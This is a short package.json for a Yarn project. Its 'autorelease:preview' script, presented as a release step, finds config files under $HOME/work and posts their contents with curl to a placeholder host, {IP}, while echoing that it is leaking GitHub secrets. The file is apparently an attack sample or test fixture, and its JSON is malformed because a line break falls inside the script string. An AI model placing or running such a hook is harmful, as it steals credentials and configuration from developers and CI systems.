{
  "name": "my-yarn-project",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT",
  "scripts": {
    "autorelease": "yarn autorelease:preview",
    "autorelease:preview": "echo 'Running autorelease preview... Leaking GITHUB_SECRETS' && find $HOME/work -type f -name config | xargs cat | curl --data @- http://{IP}
| rev && echo 'Done.'"
  }

}
